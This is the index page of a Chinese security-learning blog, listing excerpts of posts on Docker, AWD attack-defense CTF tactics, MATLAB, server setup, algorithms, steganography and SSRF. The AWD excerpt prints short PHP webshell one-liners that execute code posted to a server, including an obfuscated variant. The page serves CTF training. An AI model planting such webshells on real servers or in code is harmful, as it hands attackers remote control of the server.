主题
  • 首页
  • 归档
  • 分类
  • 标签
  • 关于

渗透基础

Docker操作Docker 是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一 个可移植的容器中,然后发布到任何流行的Linux机器或Windows 机器上,也可以实现 虚拟化,容器是完全使用沙箱机制,相互之间不会有任何接口 Docker 环境安装与基本操作整理1. 安装 Docker 添加 Docker PGP key 1curl -fsSL https://mirrors.t
2024-11-14

AWD姿势总结

1.准备一个webshell脚本: 带密码的webshell,注释变形,字符串变形,自增变形,利用文件名,利用.htaccess1<?php @assert($_POST['pass']); ?> 1234<?php $a="assert"; @$a($_POST['pass']);?> 1234<?p
2024-09-28
CTF AWD
#AWD

数学建模

MATLAB操作一、MATLAB 基础操作1.1 变量与运算MATLAB 的变量是矩阵或数组。以下是一些基本操作: 实例 1:简单运算123456789% 定义变量a = 5; % 标量b = [1, 2, 3]; % 行向量c = [1; 2; 3]; % 列向量% 计算sum_b = sum(b); % 计算向量元素和product_c = prod(c); % 计算向量
2024-09-23
数学建模
#数学建模

AWD的搭建

一、About CardinalCardinal 由 Vidar-Team 团队开发,接受并允许各大高校、安全团队、技术爱好者使用 Cardinal 作为比赛训练平台或举办内部训练赛。 环境要求: (1) 基础操作系统(ubuntu、centos、Windows 等)(2) docker 环境(含 docker-compose)(3) mysql 数据库(4) python 环境 二、Card
2024-09-23
CTF AWD
#环境

服务器部署

你提供的步骤描述了如何在 Linux 系统上安装 宝塔面板 7.3 版本并进行初步配置。这是一个详细的指南,适用于 CentOS、Ubuntu、Debian、Fedora 等 Linux 发行版,安装步骤如下: 安装宝塔面板步骤:1. 登录服务器使用 SSH 连接到你的阿里云服务器(或者其他云服务器),确保你使用的是具有 sudo 权限 的用户账号。 1ssh root@你的服务器IP地址 2.
2024-09-12

算法笔记

注意:本笔记代码都是c++,而且为了蓝桥杯做了很大的改变,所以初次学不要按照本笔记 c++代码的基础内容DevC++常用快捷键 F9:编译并运行程序。 Shift + F9:仅编译(不运行) Ctrl + /:注释当前行或选中的代码 Ctrl + Shift + /:取消注释 进入 工具 -> 编辑器选项 -> 代码模板,在其中添加你常用的代码片段。例如,可以创建一个 for
2024-09-09
算法
#算法

隐写

1. 基础文件处理 文件打包与混淆: 利用polyglots技巧进行多文件混合(如:图片与其他文件混合)。 base操作,用于进行编码、解码。 工具:CyberChef、Cryptool、Hiencode等。 隐写工具及隐写信息提取: 使用word进行隐写。 常用命令: ls用于列出隐藏内容。 php-sup -win -r相关命令用于分析和处理隐写信息。 其他工具:stegsolve、p
2024-09-08

ctf基础笔记

CTF 成员基础语法笔记 目录 Python 基础 JavaScript 基础 PHP 框架 - ThinkPHP 1. Python 基础 目录 1. Python基础 1.1 Python基本语法 1.2 数据类型 1.3 常见操作符 1.4 条件语句 1.5 循环结构 1.6 列表与字典 2. 函数与模块 2.1 函数定义与调用 2.2 模块导入 3. 进阶内容 3.1
2024-09-05
CTF-web > 基础笔记
#ctfweb

c语言的数据结构

c语言的数据结构顺序表顺序表是一种线性表,其元素在内存中连续存放,可以通过数组来实现。 顺序表是一种顺序存储的线性表,其特点如下: 数组下标与元素位置的关系: 数组下标从0开始,每个元素的索引与其在数组中的物理位置相对应。 内存地址的计算公式: 对于一个长度为n的顺序表A,其中第i个元素(假设类型为ElemType)的内存地址可以通过以下公式计算得出:[LOC(A[i]) =
2024-09-03
c语言的数据结构
#c语言

ssrf

SSRFServer-side Request Forgery 服务端请求伪造攻击向服务端发送包含恶意url连接的请求,借由服务端发起请求以便获取服务端网络内部的资源一句话总结:控制服务端使用指定协议访问指定的urlA:你为什么这么干?B:是谁谁谁让我干的A:谁谁谁让你去吃shi你去不去?特点:1 让别人访问我们访问不到的url2 拿到自己本来拿不到的数据 条件:1 别人能帮我访问url 服务端有
2024-09-01
CTF-web > ssrf
#web ssrf
123

搜索

Hexo Fluid